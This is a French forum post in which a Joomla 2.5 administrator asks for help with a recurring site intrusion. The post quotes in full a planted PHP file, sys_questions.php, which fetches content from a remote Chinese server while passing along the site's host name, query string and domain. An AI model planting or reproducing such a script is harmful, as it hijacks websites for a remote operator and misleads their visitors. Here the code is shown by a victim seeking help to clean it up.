Intrusion site WEB

Bonjour,

Nous avons actuellement (et apparemment depuis un bon moment) des intrusions sur notre site WEB.
C'est un joomla 2.5 installé sous Debian 6 (je sais c'est vieux, mais je n'ai pas les connaissances pour faire les MAJ et pas la possibilité de repartir sur du neuf).
Récemment le fichier index.php avait été modifié pour renvoyer vers une IP à Hong Kong.

Des fichiers de ce type sont créés régulièrement (même après suppression) :

sys_questions.php

<?php
set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$Remote_server = "http://zhou.5325669.com/"; 
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($Remote_server."/index.html?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;

?>

J'ai fait un scan clamav mais il n'a apparemment pas trouvé la cause de cette situation.

Merci d'avance pour votre aide.

Edit : Après changement de droits (retrait droit d'execution pour Others), les fichiers ont disparu. Ils sont réapparus après la remise des droits.
J'imagine qu'il s'agit donc d'un script qui s'execute lorsque le serveur est connecté à internet.